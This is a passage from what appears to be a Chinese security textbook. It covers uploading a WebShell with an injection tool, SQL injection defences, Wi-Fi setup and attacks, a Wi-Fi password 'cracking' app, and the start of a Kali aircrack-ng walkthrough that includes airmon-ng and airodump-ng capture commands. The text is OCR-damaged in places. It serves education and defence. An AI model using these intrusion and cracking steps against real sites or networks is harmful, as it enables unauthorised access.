三个列表中的详细内容。通过单击下方的“添加”和“删除”按钮，可以对三个列表的内容进行相应的操作，如图 7-64所示。

图 7-64 “检测设置区”标签页 
3.使用 Domain上传 WebShell

使用 Domain上传 WebShell的方法很简单，具体的操作步骤如下。

Step01在“Domain注入工具”主窗口中单击“综合上传”选项卡，根据需要选择上传的类型（这
里选择类型为：动网上传漏洞），在“基本设置”栏目中，填写前面所检测出的任意一个漏洞页面地址并选中“默认网页木马”单选按钮，在“文件名”和 Cookies文本框中分别输入相应的内容，如图 7-65所示。 

Step02单击“上传”按钮，即可在“返回信息”栏目中看到需要上传的 Webshell地址，如图 7-66
所示。单击“打开”按钮，即可根据上传的 Webshell地址打开对应页面。


　


图 7-65 “综合上传”页面图 7-66 上传 Webshell地址 
7.5.SQL注入攻击的防范
随着 Internet逐渐普及，基于 Web的各种非法攻击也不断涌现和升级，很多开发人员被要求使

他们的程序变得更安全可靠，这也逐渐成为这些开发人员共同面对的问题和责任。由于目前 SQL微视频注入攻击被大范围地使用，因此对其进行防御非常重要。 
7.5.1.对用户输入的数据进行过滤
要防御 SQL注入，用户输入的变量就绝对不能直接被嵌入 SQL语句中，所以必须对用户输入内容进行过滤，也可以使用参数化语句将用户输入嵌入语句中，这样可以有效地防止 SQL注入式攻击。在数据库的应用中，可以利用存储过程实现对用户输入变量的过滤，例如可以过滤掉存储过程中的分号，这样就可以有效避免 SQL注入攻击。
总之，在不影响数据库应用的前提下，可以让数据库拒绝分号分隔符、注释分隔符等特殊字符的输入。因为，分号分隔符是 SQL注入式攻击的主要帮凶，而注释只有在数据设计时用得到，一般用户的查询语句是不需要注释的。拒绝 SQL语句中的这些特殊符号，即使在 SQL语句中嵌入了恶意代码，也不会引发 SQL注入式攻击。 
7.5.2.使用专业的漏洞扫描工具
黑客目前通过自动搜索攻击目标并实施攻击，该技术甚至可以轻易地被应用于其他的 Web架构中的漏洞。企业应当投资于一些专业的漏洞扫描工具，如 Web漏洞扫描器，如图 7-67所示。一个完善的漏洞扫描程序不同于网络扫描程序，专门查找网站上的 SQL注入式漏洞，最新的漏洞扫描程序也可查找最新发现的漏洞。程序员应当使用漏洞扫描工具和站点监视工具对网站进行测试。

图 7-67 Web漏洞扫描器 
7.5.3.对重要数据进行验证 
MD5（Message-Digest Algorithm5）又称为“信息摘要算法”，即不可逆加密算法，对重要数据用户可以用 MD5算法进行加密。
在 SQL Server数据库中，有比较多的用户输入内容验证工具，可以帮助管理员来对付 SQL注入式攻击。例如，测试字符串变量的内容，只接受所需的值；拒绝包含二进制数据、转义序列和注释字符的输入内容；测试用户输入内容的大小和数据类型，强制执行适当的限制与转换等。这些措施既能有助于防止脚本注入和缓冲区溢出攻击，还能防止 SQL注入式攻击。
总之，通过测试类型、长度、格式和范围来验证用户输入，过滤用户输入的内容，这是防止 SQL注入式攻击的常见并且行之有效的措施。 
7.6.实战演练 
7.6.1.实战1：检测网站的安全性 
360网站安全检测平台为网站管理者提供了网站漏洞检测、网站挂马实时监控、网站篡改实时

微视频监控等服务。
使用 360网站安全检测平台检测网站安全的操作步骤如下。 

Step01在 IE浏览器中输入 360网站安全检测平台的网址 http://webscan.360.cn/，打开 360网站
安全的首页，在其中输入要检测的网站地址，如图 7-68所示。 

Step02单击“检测一下”按钮，即可开始对网站进行安全检测，并给出检测的结果，如图 7-69
所示。 

Step03如果检测出来网站存在安全漏洞，就会给出相应的评分，然后单击“我要更新安全得分”
按钮，就会进入 360网站安全修复界面，在对站长权限进行验证后，就可以修复网站安全漏洞了，如图 7-70所示。


　　


　　　图 7-68 输入网站地址图 7-69 检测的结果

图 7-70 修复网站安全漏洞 
7.6.2.实战2：查看网站的流量
使用 CNZZ数据专家可以查看网站流量。CNZZ数据专家是全球最大的中文网站统计分析平台，为各类网站提供免费、安全、稳定的流量统计系统与网站数据服务，帮助网站创造更大价值。使用 CNZZ数据专家查看网站流量的具体操作步骤如下。 

Step01在 IE浏览器中输入网址 http://www.cnzz.com/，打开 CNZZ数据专家网主页，如图 7-71所示。 

Step02单击“免费注册”按钮进行注册，进入创建用户界面，根据提示输入相关信息，如图 7-72
所示。



　　　　
图 7-71 CNZZ数据专家网主页图 7-72 输入注册信息




　


　　图 7-73 “添加站点”界面图 7-74 输入相关信息 


长统计文字样式”），如图 7-76所示。


　


图 7-75 “站点设置”界面图 7-76 复制代码 



　

图 7-77 插入源码图 7-78 预览效果

Step09单击“站长统计”按钮，进入“查看用户登录”界面，如图 7-79所示。 

Step10进入查看界面，即可查看网站的浏览量，如图 7-80所示。

　


图 7-79 “查看用户登录”界面图 7-80 查看网站的浏览量
第章
8




Wi-Fi的攻击与防范 
Wi-Fi是一种可以将个人计算机、手持设备（如 PDA、手机）等终端以无线方式互相连接的技术。本章介绍无线 Wi-Fi的安全防护策略，主要内容包括 Wi-Fi技术的由来、电子设备 Wi-Fi连接、 Wi-Fi安全防护策略等。 
8.1.认识 Wi-Fi
说起 Wi-Fi，大家都知道可以无线上网，其实， Wi-Fi是一种无线连接方式，并不是无线网络或者是其他无线设备。 
8.1.1.Wi-Fi的通信原理 
Wi-Fi是一个无线网络通信技术的品牌，由 Wi-Fi联盟（ Wi-Fi Alliance）所持有。目的在于改善基于 IEEE 802.11标准的无线网络产品之间的互通性。 Wi-Fi联盟成立于 1999年，当时的名称叫作 Wireless Ethernet Compatibility Alliance （WECA），在 2002年 10月，正式改名为 Wi-Fi Alliance。 
Wi-Fi遵循 802.11标准， Wi-Fi通信的过程采用了展频技术，具有很好的抗干扰能力，能够实现反跟踪、反窃听等功能，因此 Wi-Fi技术提供的网络服务比较稳定。 Wi-Fi技术在基站与终端点对点之间采用 2.4GHz频段通信，链路层将以太网协议作为核心，实现信息传输的寻址和校验。 
8.1.2.Wi-Fi的主要功能
以前通过网线连接计算机，自从有了 Wi-Fi技术，则可以通过无线电波来联网。常见的无线网络设备就是一个无线路由器，那么在这个无线路由器的电波覆盖的有效范围内，都可以采用 Wi-Fi连接方式进行联网，如果无线路由器连接了一条 ADSL线路或者别的上网线路，则无线路由器又可以被称为一个“热点”。
现阶段 Wi-Fi技术已经成熟， 5G的高速发展带来的问题为 Wi-Fi应用提供了机会。在 5G快速发展的背景下，运营商也越来越重视允许 Wi-Fi无线网络访问其 PS域数据业务的服务，这样可以缓解蜂窝网络数据流量压力。
8.1.3.Wi-Fi的优势 
Wi-Fi通信时组建无线网络，基本配置就需要无线网卡及一台无线访问接入点（ AP）。将 AP与有线网络连接， AP与无线网卡之间通过电磁波传递信息。如果需要组建由几台计算机组成的对等网络，可以直接为计算机安装无线网卡实现，而不需要使用 AP。总之， Wi-Fi技术具有如下优势。 
1.无须布线，覆盖范围广

无线局域网由 AP和无线网卡组成， AP和无线网卡之间通过无线电波传递信息，不要布线。在一些布线受限的条件下更具有优势，例如为了不使古建筑受到破坏，不宜在古建筑群中布线，此时可以通过 Wi-Fi来搭建无线局域网。 Wi-Fi技术使用 2.4GHz频段的无线电波，覆盖半径可达 100m左右。 
2.速度快，可靠性高 

802.11b无线网络规范属于 IEEE 802.11网络规范，正常情况下最高带宽可达 11Mbps，在信号较弱或者有干扰的情况下带宽可自行调整为 5.5 Mbps、2Mbps和 1Mbps，从而使得无线网络更加稳定可靠。 
3.对人体无害

手机的发射功率为 200mW～ 1W，手持式对讲机发射功率为 4～ 5W，而 Wi-Fi采用 IEEE 
802.11标准，要求发射功率不得超过 100mW，实际发射功率在 60～ 70mW之间。由此可以看出 Wi-Fi发射的功率较小，而且不与人体直接接触，对人体无害。 
8.2.电子设备 Wi-Fi连接
无线局域网络的搭建给家庭无线办公带来了很多方便，而且可随意改变家庭里的办公位置而不受束缚，大大适合了现代人的追求。 
8.
2.1.搭建无线网环境

建立无线局域网的操作比较简单，在有线网络到户后，用户只需连接一个具有无线 Wi-Fi功能的路由器，然后各房间里的计算机、笔记本电脑、手机和 iPad等设备利用无线网卡与路由器之间建立无线连接，即可构建整个办公室的内部无线局域网。 

8.
2.2.配置无线路由器


建立无线局域网的第一步就是配置无线路由器，默认情况下，具有无线功能的路由器不开启无

线功能，需要用户手动配置，在开启了路由器的无线功能后就可以配置无线网了。使用计算机配置微视频无线网的操作步骤如下。 

Step01打开 IE浏览器，在地址栏中输入路由器的网址，一般情况下路由器的默认网址为 
“192.168.0.1”，输入完毕后单击“确认”按钮，即可打开路由器登录窗口，如图 8-1所示。 

Step02在“请输入管理员密码”文本框中输入管理员的密码，默认情况下管理员的密码为 
“123456”，如图 8-2所示。 

Step03单击“确认”按钮，即可进入路由器的“运行状态”工作界面，在其中可以查看路由器
的基本信息，如图 8-3所示。 

Step04选择窗口左侧的“无线设置”选项，在打开的子选项中选择“基本信息”选项，即可在
右侧的窗格中显示无线设置的基本功能，并勾选“开启无线功能”和“开启 SSID广播”复选框，如图 8-4所示。



　
　　　图 8-1 路由器录录窗口图 8-2 输入管理员的密码



　
　图 8-3 “运行状态”工作界面图 8-4 无线设置的基本功能 

Step05当开启了路由器的无线功能后，单击“保存”按钮进行保存，然后重新启动路由器，即
可完成无线网的设置，这样具有 Wi-Fi功能的手机、计算机、 iPad等电子设备就可以与路由器进行
无线连接，从而实现共享上网。 
8.2.3.将计算机接入 Wi-Fi
笔记本电脑具有无线接入功能，台式计算机要想接入无线网，需要购买相应的无线接收

微视频
器。这里以笔记本电脑为例，介绍如何将其接入无线网，具体的操作步骤如下。 

Step01双击笔记本电脑桌面右下角的无线
连接图标，打开“网络和共享中心”窗口，在
其中可以看到本台笔记本电脑的网络连接状态，
如图 8-5所示。 


Step02单击笔记本电脑桌面右下角的无线连接图标，在打开的界面中显示了自动搜索的图 8-5 “网络和共享中心”窗口无线设备和信号，如图 8-6所示。


Step03单击一个无线连接设备，展开无线连接功能，在其中勾选“自动连接”复选框，如图 8-7
所示。


　　　　　


　　　　　　图 8-6 无线设备和信号图 8-7 无线连接功能 

Step04单击“连接”按钮，在打开的界面中输入无线连接设备的连接密码，如图 8-8所示。 

Step05单击“下一步”按钮，开始连接网络，如图 8-9所示。


　　　　


图 8-8 输入密码图 8-9 开始连接网络 

Step06连接到网络之后，桌面右下角的无线连接设备显示正常，并以弧线的方法给出信号的强
弱，如图 8-10所示。 

Step07再次打开“网络和共享中心”窗口，在其中可以看到这台笔记本电脑当前的连接状态，
如图 8-11所示。



　　　

　　图 8-10 连接设备显示正常图 8-11 当前的连接状态
8.2.4.将手机接入 Wi-Fi
无线局域网配置完成后，用户可以将手机接入 Wi-Fi，从而实现无线上网。这里以 Android系
微视频统为例演示手机接入 Wi-Fi，具体的操作步骤如下。 

Step01在手机界面中用手指点按“设置”图标，进入手机的“设置”界面，如图 8-12所示。 

Step02使用手指点按 WLAN右侧的“已关闭”，开启手机 WLAN功能，并自动搜索周围可用
的 WLAN，如图 8-13所示。


　　　　　　


图 8-12 “设置”界面图 8-13 手机 WLAN功能 

Step03使用手指点按下面可用的 WLAN，弹出连接界面，在其中输入相关密码，如图 8-14所示。 

Step04点按“连接”按钮，即可将手机接入 Wi-Fi，并在下方显示“已连接”字样，这样手机
就接入了 Wi-Fi，然后就可以使用手机上网了，如图 8-15所示。


　　　　　　


图 8-14 输入密码图 8-15 显示“已连接”字样 
8.3.Wi-Fi密码的破解 
Wi-Fi万能钥匙是一款十分受欢迎的免费上网工具。通过 Wi-Fi万能钥匙，用户可以随时查看周围有哪些可分享热点，帮助用户自动连接到网络，让用户随时随地都能上网。
8.3.1.手机版 Wi-Fi万能钥匙
使用手机版 Wi-Fi万能钥匙破解 Wi-Fi密码的操作步骤如下。 

Step01下载 Wi-Fi万能钥匙。在手机的应用程序 App中搜索 Wi-Fi万能钥匙，在搜索结果中选择合适的 App，单击“下载”按钮将安装包下载到手机上，如图 8-16所示。 

Step02安装 Wi-Fi万能钥匙。Wi-Fi万能钥匙安装包下载完成后，系统会自动弹出安装提示界面，
单击“安装”按钮，即可将 Wi-Fi万能钥匙安装到手机上，如图 8-17所示。 

Step03当安装完成，会自动搜索周围可用的 Wi-Fi热点，其中带有蓝色钥匙的就是可以解锁的
热点，如图 8-18所示。




　
　

图 8-16 搜索 Wi-Fi万能钥匙图 8-17 安装 Wi-Fi万能钥匙图 8-18 可解锁热点 
8.3.2.电脑版 Wi-Fi万能钥匙
使用电脑版 Wi-Fi万能钥匙破解 Wi-Fi密码的操作步骤如下。 

Step01下载“ Wi-Fi万能钥匙”电脑版，通过搜索“ Wi-Fi万能钥匙”，选择官方版安装包下载，
如图 8-19所示。 

Step02安装电脑 Wi-Fi万能钥匙，双击下载的安装包，即可安装电脑版 Wi-Fi万能钥匙，如
图 8-20所示。

　


图 8-19 搜索 Wi-Fi万能钥匙图 8-20 安装 Wi-Fi万能钥匙 

Step03双击 Wi-Fi万能钥匙图标，打开 Wi-Fi万能钥匙进入主界面， Wi-Fi万能钥匙会自动搜
索周围热点，并且将热点信息显示出来，如图 8-21所示。 

Step04选择可用热点，并在下方单击“自动连接”按钮，如图 8-22所示。


　


　　　图 8-21 显示热点信息图 8-22 自动连接热点 

Step05连接完成后，就会弹出一个信息提示框，提示连接热点成功，如图 8-23所示。 

Step06返回 Wi-Fi万能钥匙主界面，可以看到已连接提示信息，如图 8-24所示。

　　


　图 8-23 连接热点成功图 8-24 已连接提示信息 
8.3.3.防止 Wi-Fi万能钥匙破解密码 
Wi-Fi万能钥匙破解密码是可以防范的，下面给出几个防范 Wi-Fi万能钥匙破解密码的方法。
（1）将无线加密方式设置为 WPA2-PSK。WPA2-PSK加密方式目前来说比较安全，不易被破解。
（2）设置复杂的 Wi-Fi密码。破解软件通常使用字典来破解 Wi-Fi密码，密码设置得越简单就越容易被破解。在设置密码时最好将字母和数字组合使用，密码长度也不要太短，复杂的密码可以有效提高 Wi-Fi的安全，防止被他人破解。

（3）隐藏网络 SSID号。隐藏了 SSID，周围的无线设备就无法扫描到热点，从源头上减少了被攻击的可能性。除非黑客通过其他方式获取了热点的 SSID，手动输入 SSID后对热点进行攻击。

（4）在使用 Wi-Fi万能钥匙连接自己创建的热点时，不要将个人热点分享。因为一旦分享了自己的热点，别人就可直接连接到热点，并且分享可以扩散，被分享的次数越多自己的热点就越不安全。 


8.4.常见 Wi-Fi攻击方式
无线网络存在巨大的安全隐患，家庭使用的无线路由器可以被黑客攻破，公共场所的免费 Wi-Fi热点有可能就是钓鱼陷阱。用户在毫不知情的情况下，就可能造成个人敏感信息泄露，稍有不慎访问了钓鱼网站，就会造成直接的经济损失。
8.4.1.暴力破解
暴力破解的原理就是使用攻击者自己的用户名和密码字典，一个一个去枚举，尝试是否能够登录。通过软件形式抓取无线网络的握手包进行暴力破解，比较有名的破解方式 Kali系统涵盖很多无线渗透工具，如 aircrack-ng、Wi.te等。
暴力破解的防护主要是设置高强度密码，尽量使用大小写字母 +数字 +符号的 12位以上组合，这样基本上暴力破解是无法破解的。 
8.4.2.钓鱼陷阱
许多消费场所为了迎合消费者的需求，提供更加高质量的服务，都会为消费者提供免费的 Wi-Fi接入服务。例如，在进入一家餐馆或者咖啡馆时，我们往往会搜索一下周围开放的 Wi-Fi热点，然后找服务员索要连接密码。这种习惯为黑客提供了可乘之机，黑客会提供一个名字和商家类似的免费 Wi-Fi接入点，诱惑用户接入。
用户如果不仔细确认很容易连接到黑客设定的 Wi-Fi热点，这样用户上网的所有数据包，都会经过黑客设备转发。黑客会将用户的信息截留下来分析，一些没有加密的通信就可以直接被查看，导致用户信息泄露。
钓鱼陷阱的防护，要做到在外尽量不要使用公共的 Wi-Fi网络，使用的过程中尽量不要操作登录或者支付等动作。钓鱼陷阱一个常见排查方式就是查看 Wi-Fi的信号强度，是否跟之前连接的信号强度差距比较大，或者查看出现相同 SSID的无线网络。 
8.4.3.攻击无线路由器
黑客对无线路由器的攻击需要分步进行，首先黑客会扫描周围的无线网络，在扫描到的无线网络中选择攻击对象，然后使用黑客工具攻击正在提供服务的无线路由器。主要做法是干扰移动设备与无线路由器的连接，抗攻击能力较弱的网络连接就可能因此而短线，继而连接到黑客预先设置好的无线接入点上。
黑客攻击家用路由器时，首先使用黑客工具破解家用无线路由器的连接密码，如果破解成功，就可以利用密码成功连接到家用路由器，这样就可以免费上网。黑客不仅可以免费享用网络带宽，还可以尝试登录到无线路由器管理后台。登录无线路由器管理后台同样需要密码，但大多数用户安全意识比较薄弱，会使用默认密码或者使用与连接无线路由器相同的密码，这样很容易被猜到。 
8.4.4.WPS 
PIN攻击 

WPS PIN攻击功能是路由器与无线设备（手机、笔记本电脑等）之间的一种加密方式；而 PIN码是 WPS的一种验证方式，相当于无线 Wi-Fi的密码。黑客会使用一些软件检测路由器是否启用 PIN码，从而进行 PIN码的暴力破解攻击， Kali中也有包含 PIN工具的软件 Reaver，PIN码攻击成功的概率比较高。 

8.
4.5.内网监听


黑客在连接到一个无线局域网后，就可以很容易地对局域网内的信息进行监听，包括聊天内容、浏览网页记录等。
实现内网监听有两种方式，一种方式是 ARP攻击， ARP攻击就是在用户的手机、计算机和路由之间伪造成中转站，这样不但可以对经过的流量进行监听，还能对流量进行限速；另一种方式是利用无线网卡的混杂模式监听，它可以收到局域网内所有的广播流量。这种攻击方式要求局域网内要有正在进行广播的设备，如 HUB。在公司或网吧我们经常看到 HUB，这是一种“一条网线进，几十条网线出”的扩充设备。

针对内网监听攻击，其中应对 ARP攻击可以通过配置 ARP防火墙来防范，应对混杂模式监听可以使用 SSL VPN对流量进行加密。 
8.5.Wi-Fi攻击的防范
在无线网络中，能够发送与接收信号的重要设备就是无线路由器了，因此，对无线路由器的安全防护，就等于看紧了无线网络的大门。 
8.5.1.MAC地址过滤
网络管理的主要任务之一就是控制客户端对网络的接入和对客户端的上网行为进行控制，无线
微视频网络也不例外，通常无线 AP利用媒体访问控制（ MAC）地址过滤的方法来限制无线客户端的接入。使用无线路由器进行 MAC地址过滤的具体操作步骤如下。 

Step01打开路由器的 Web后台设置界面，单击左侧“无线设置”→“ MAC地址过滤”选项，
默认情况下 MAC地址过滤功能是关闭状态，单击“启用过滤”按钮，开启 MAC地址过滤功能，单击“添加新条目”按钮，如图 8-25所示。 

Step02打开“ MAC地址过滤”对话框，在 “MAC地址”文本框中输入无线客户端的 MAC地址，
本实例输入 MAC地址为“ 00-0C-29-5A-3C-97”，在“描述”文本框中输入 MAC描述信息 sushipc，在“类型”下拉菜单中选择“允许”选项，在“状态”下拉菜单中选择“生效”选项，依照此步骤将所有合法的无线客户端的 MAC地址加入此 MAC地址表后，单击“保存”按钮，如图 8-26所示。


　　


　图 8-25 开启 MAC地址过滤功能图 8-26 “MAC地址过滤”对话框 1 


Step03选中“过滤规则”选项下的“禁止”
单选按钮，表明在下面 MAC列表中生效规则之外的 MAC地址可以访问无线网络，如图 8-27所示。
这样无线客户端在访问无线 AP时，会发现除了 MAC地址表中的 MAC地址之外，其他的 MAC地址无法访问无线 AP，也就无法访问互联网。
图 8-27 “MAC地址过滤”对话框 2 

8.5.2.禁用 SSID广播
无线路由器禁用 SSID广播的具体操作步骤如下。 
Step01打开路由器的 Web后台设置界面，设置自己无线网络的 SSID信息，取消勾选“允许 
微视频SSID广播”复选框，单击“保存”按钮，如图 8-28所示。 
Step02弹出一个信息对话框，单击“确定”按钮，重新启动路由器即可，如图 8-29所示。



　　　
　　图 8-28 无线网络的 SSID信息图 8-29 信息提示框 
8.5.3.WPA-PSK加密 
WPA-PSK可以看成是一个认证机制，只要求一个单一的密码进入每个无线局域网节点（如无线路由器），只要密码正确，就可以使用无线网络。下面介绍如何使用 WPA-PSK或者 WPA2-PSK微视频加密无线网络。 


Step01打开路由器的 Web后台设置界面，选择左侧“无线设置”→“基本设置”选项，勾选“开启安全设置”复选框，在“安全类型”下拉列表中选择 WPA-PSK/WAP2-PSK选项，在“安全选项”和“加密方法”下拉菜单中分别选择“自动选择”选项，在“ PSK密码”文本框中输入密码，本实例设置密码为 sushi1986，如图 8-30所示。 

Step02单击“保存”按钮，弹出一个信息对话框，单击“确定”按钮，重新启动路由器即可，如图 8-31所示。



　　　
　　　图 8-30 输入密码图 8-31 信息提示框 
8.5.4.修改管理员密码
路由器的初始密码比较简单，为了保证局域网的安全，一般需要修改或设置管理员密码，具体的操作步骤如下。微视频

143


Step01打开路由器的 Web后台设置界面，选择“系统工具”选项下的“修改登录密码”选项，
打开“修改管理员密码”工作界面，如图 8-32所示。 

Step02在“原密码”文本框中输入原来的密码，在“新密码”和“确认新密码”文本框中输入
新设置的密码，最后单击“保存”按钮即可，如图 8-33所示。

　


　　　图 8-32 修改管理员密码工作界面图 8-33 输入密码 

8.5.5.《360路由器卫士》
《360路由器卫士》是一款由 360官方推出的绿色免费的家庭必备无线网络管理工具。 360路由
微视频器卫士软件功能强大，支持几乎所有的路由器。在管理的过程中，一旦发现蹭网设备想踢就踢。下面介绍使用 360路由器卫士管理网络的操作方法。 

Step01下载并安装《 360路由器卫士》，双击桌面上的快捷图标，打开“路由器卫士”工作界面，
提示用户正在连接路由器，如图 8-34所示。 

Step02连接成功后，在弹出的对话框中输入路由器的账号与密码，如图 8-35所示。

　　　　


　　　图 8-34 “路由器卫士”工作界面　　　图 8-35 输入路由器账号与密码 

Step03单击“下一步”按钮，进入“我的路由”工作界面，在其中可以看到当前的在线设备，
如图 8-36所示。 

Step04如果想要对某个设备限速，则可以单击设备后的“限速”按钮，打开“限速”对话框，
在其中设置设备的上传速度与下载速度，设置完毕后单击“确认”按钮即可保存设置，如图 8-37所示。 

Step05在管理的过程中，一旦发现有蹭网设备，可以单击该设备后的“禁止上网”按钮，如图 8-38
所示。

　　　　


图 8-36 “我的路由”工作界面图 8-37 “限速”对话框 

Step06禁止上网之后，单击“黑名单”选项卡，进入“黑名单”设置界面，在其中可以看到被
禁止的上网设备，如图 8-39所示。


　


　　图 8-38 禁止不明设备上网　　图 8-39 “黑名单”设置界面 

Step07选择“路由防黑”选项卡，进入“路由防黑”设置界面，在其中可以对路由器进行防黑
检测，如图 8-40所示。 

Step08单击“立即检测”按钮，即可开始对路由器进行检测，并给出检测结果，如图 8-41所示。


　


图 8-40 “路由防黑”设置界面图 8-41 检测结果 

Step09选择“路由跑分”选项卡，进入“路由跑分”设置界面，在其中可以查看当前路由器信息，
如图 8-42所示。 

Step10单击“开始跑分”按钮，即可开始评估当前路由器的性能，如图 8-43所示。


　


　图 8-42 “路由跑分”设置界面图 8-43 评估当前路由器的性能 

Step11评估完成后，会在“路由跑分”界面中给出跑分排行榜信息，如图 8-44所示。

图 8-44 跑分排行榜信息 


“路由设置”选项卡，进入“路由设置”设置界面，在其中可以对宽带上网、Wi-Fi密码、
路由器密码等选项进行设置，如图 8-45所示。 

Step13选择“路由时光机”选项，在打开的界面中单击“立即开启”按钮，即可打开“时光机
开启”设置界面，在其中输入 360账号与密码，然后单击“立即登录并开启”按钮，即可开启时光机，如图 8-46所示。


　


　　　图 8-45 路由设置界面图 8-46 “时光机开启”设置界面 

Step14选择“宽带上网”选项，进入“宽带上网”界面，在其中输入网络运营商给出的上网账
号与密码，单击“保存设置”按钮，即可保存设置，如图 8-47所示。

Step15选择“ Wi-Fi密码”选项，进入“ Wi-Fi密码”界面，在其中输入 Wi-Fi密码，单击“保
存设置”按钮，即可保存设置，如图 8-48所示。


　


　　图 8-47 “宽带上网”界面图 8-48 “Wi.密码”界面 

Step16选择“路由器密码”选项，进入“路由器密码”界面，在其中输入路由器密码，单击“保
存设置”按钮，即可保存设置，如图 8-49所示。 

Step17选择“重启路由器”选项，进入“重启路由器”界面，单击“重启”按钮，即可对当前
路由器进行重启操作，如图 8-50所示。


　


　图 8-49 “路由器密码”界面图 8-50 “重启路由器”界面
另外，使用《 360路由器卫士》在管理无线网络安全的过程中，一旦检测到有设备通过路由器上网，就会在计算机桌面的右上角弹出信息提示框，如图 8-51所示。单击“管理”按钮，即可打开该设备的详细信息界面，在其中可以对网速进行限制管理，最后单击“确认”按钮即可，如图 8-52所示。


　　

　　　　　　　图 8-51 信息提示框　　图 8-52 详细信息界面
8.6.实战演练 

8.6.1.实战1：加密手机的 WLAN热点
为保证手机的安全，一般需要给手机的 WLAN热点功能添加密码，具体的操作步骤如下。 
微视频
Step01在手机的移动热点设置界面中，点按“配置 WLAN热点”功能，在弹出的界面中点按“开
放”选项，可以选择手机设备的加密方式，如图 8-53所示。 

Step02选择好加密方式后，即可在下方显示密码输入框，在其中输入密码，然后单击“保存”
按钮即可，如图 8-54所示。 

Step03加密完成后，使用计算机再连接手机设备时，系统提示用户输入网络安全密钥，如图 8-55
所示。


　　　　　　



　图 8-53 配置 WLAN热点图 8-54 输入密码图 8-55 输入网络安全密钥 

8.6.2.实战2：无线路由器的 WEP加密
打开路由器的 Web后台设置界面，单击左侧“无线设置”→“基本设置”选项，勾选“开启
微视频安全设置”复选框，在“安全类型”下拉菜单中选择 WEP选项，在“密钥格式选择”下拉菜单中选择“ ASCⅡ码”选项。设置密钥，在“密钥 1”后面的“密钥类型”下拉列表中选择 “64位”选项，在“密钥内容”文本框中输入要使用的密码，本实例输入密码 cisco，单击“保存”按钮，如图 8-56所示。

图 8-56 Web后台设置界面
第章
9



无线路由器的密码破解
无线路由器的加密方式包括 WEP、WPA与 WPS三种方式，针对不同的方式，破解密码的工具以及安全维护方式都不同。本章介绍无线路由器的密码破解，主要内容包括破解 WEP密码、破解 WPA密码与破解 WPS密码，通过了解破解密码的方式，进而有针对性地保护无线路由器的密码。 
9.1.破解密码前的准备工作
在开始破解密码之前需要有一些准备工作，这里需要用户购买一个无线网卡，该网卡需要适合 Kali虚拟机，一般 atheros芯片的无线网卡可以安装在 Kali虚拟机中，不过，为确保购买的网卡正确，购买前请认真询问是否支持 Kali虚拟机。 
9.1.1.查看网卡信息
购买无线网卡后，下面就可以查看网卡的信息了，包括网卡模式、网卡信息、网卡映射信息等。具体的操作步骤如下。 

Step01查看网卡模式。使用 iw list命令查看网卡的信息，执行结果如图 9-1所示，这里显示出来的模式是该网卡所支持的所有模式。 

Step02在 Kali Linux命令界面中输入 ifcon.g -a命令，通


过这个命令可以查看本机所有网卡信息，可以看到此时本台图 9-1 网卡所支持的模式计算机中没有无线网卡，如图 9-2所示。

图 9-2 查看网卡信息


择“可移动设备”命令，再从可移动设备中选择相应的无线网卡并进行连接，如图 9-3所示。


图 9-3 选择无线网卡 

Step04此时会弹出一个提示框，询问是否连接 USB设备，单击“确定”按钮，如图 9-4所示。 
Step05再次运行 ifcon.g -a命令，这时会多出一个 wlan开头的网卡，这就是无线网卡，如图 9-5所示。
图 9-4 提示框


图 9-5 查看无线网卡 
Step06使用 iwconfig命令可只显示无线网卡信息，执行结果如图 9-6所示。
图 9-6 显示无线网卡信息
9.1.2.配置网卡进入混杂模式
配置无线网卡进入混杂模式之后，才可以抓取 802.11无线通信协议。配置网卡进入混杂模式的

操作步骤如下。 微视频

Step01使用 iw dev wlan0 interface add wlan0mon type monitor命令可以将一个网卡置入混杂模式。其中 dev后面跟的是具体无线网卡的名称，新增加的网卡名称必须是 wlan +一个数字 + mon这种形式，如图 9-7所示。

图 9-7 设置网卡为混杂模式 

Step02设置完成后，运行 iwconfig命令，查看无线网卡信息，如图 9-8所示，其中会多出一个 wlan0mon无线网卡，并且模式是 monitor（混杂模式）。

图 9-8 查看无线网卡信息 

Step03执行 ifcon.g wlan0mon up命令，将新加入的无线网卡启用，再次运行 ifconfig命令，可以看到网卡列表中已经启用的 wlan0mon无线网卡，如图 9-9所示。此时使用 Wireshark抓包软件便可以抓取 802.11无线通信协议数据包了。

图 9-9 启用无线网卡 
9.
2.密码破解工具 Aircrack 

Aircrack是目前 WEP/WPA/WPA2破解领域中最热门的工具， Aircrack-ng套件包含的工具能够捕捉数据包和握手包，生成通信数据，或进行暴力破解攻击以及字典攻击。该套件包含 Airmon-ng、Aircrack-ng、Aireplay、Airodump-ng、Airbase-ng等工具。 

9.
2.1.Airmon-ng工具 


Airmon-ng工具属于 Aircrack-ng套件中的一种， Airmon-ng用来实现无线接口在 managed和 

monitor模式之间的转换及清除干扰进程。使用 Airmon-ng工具的操作步骤如下。 微视频
Step01运行 airmon-ng命令，即可查看无线网卡的驱动芯片信息，如图 9-10所示。
151


图 9-10 无线网卡的驱动芯片信息 

Step02运行 airmon-ng --h命令，即可查看 Arimon-ng工具的命令格式，如图 9-11所示。

图 9-11 查看命令格式 

Step03运行 airmon-ng check命令，可以查看有哪些进程会影响到 Aircrack-ng套件的工作，如图 9-12所示。

图 9-12 运行 airmon-ng check命令
提示：查询完成后，用户可以通过 kill命令终止相关进程，但是 Airmon-ng工具提供了一个简便的方法，就是运行 airmon-ng check kill命令，就可以将干扰进程直接中断运行。另外，为了保证抓取数据包能顺利执行，建议用户执行 service network-manager stop命令，停止网络管理器的运行，因为这个服务会影响抓取数据包。 

Step04当配置完成后，运行 airmon-ng start wlan0命令，将无线网卡置入混杂模式，如图 9-13所示。

图 9-13 将无线网卡置入混杂模式 
Step05运行 ifconfig命令，可以查看网卡信息，执行结果如图 9-14所示。

图 9-14 查看网卡信息
提示：通过 Airmon-ng工具可以快速配置网卡进入混杂模式并启动新加入的无线网卡，这个原理同手动设置是一样的。 
9.2.2.Airodump-ng工具 
Airodump-ng工具是 Aircrack-ng套件中用于抓取数据包的工具。使用 Airodump-ng工具的操作

步骤如下。 微视频

Step01抓取网络数据包。运行 airodump-ng wlan0mon命令，进入轮询模式，并抓取网络数据包，抓取的信息如图 9-15所示，其中， CH代表信道， Airodump-ng会从网卡最小信道 -最大信道循环抓取数据包，每间隔 1s更换一个信道。

图 9-15 抓取网络数据包 

Step02抓取指定数据。运行 airodump-ng -c 1 --bssid 1C:FA:68:01:2F:08 -w wep002 wlan0mon命令，该命令只抓取信道为 1、BSSID的 MAC地址为 1C:FA:68:01:2F:08的流量包，并将抓取的数据包保存为 wep002的文件，运行结果如图 9-16所示。

